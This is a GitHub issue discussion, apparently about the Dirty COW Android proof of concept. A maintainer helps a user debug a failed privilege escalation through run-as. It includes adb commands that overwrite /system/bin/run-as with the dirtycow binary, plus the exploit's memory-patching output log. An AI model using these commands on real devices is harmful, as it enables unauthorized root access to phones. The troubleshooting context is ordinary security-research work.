timwr
commented
7 years ago Which device is this? run-as has issues on the Galaxy S4 (and some other phones I think). The phone is still vulnerable however
Open xiaoli689 opened 7 years ago
timwr
commented
7 years ago Which device is this? run-as has issues on the Galaxy S4 (and some other phones I think). The phone is still vulnerable however
xiaoli689
commented
7 years ago @timwr I think you are right. perhaps the problem is Compiler Environment.
timwr
commented
7 years ago It's not the compiler environment. You can confirm the device is vulnerable with make test. I suspect you're seeing this issue: https://code.google.com/p/android/issues/detail?id=58373
adb shell 'chmod 777 /data/local/tmp/run-as' adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as' WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6ffffffe arg 0x5f8 WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6fffffff arg 0x1 warning: new file size (13708) and file old size (9440) differ
size 13708
[] mmap 0xb63fc000 [] exploit (patch) [] currently 0xb63fc000=464c457f [] madvise = 0xb63fc000 13708 [] madvise = 0 1048576 [] /proc/self/mem 0 1048576 [*] exploited 0xb63fc000=464c457f adb shell /system/bin/run-as
WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6ffffffe arg 0x4fc WARNING: linker: /system/bin/run-as: unused DT entry: type 0x6fffffff arg 0x1 running as uid 2000 Could not set capabilities: Operation not permitted setresgid/setresuid failed uid 2000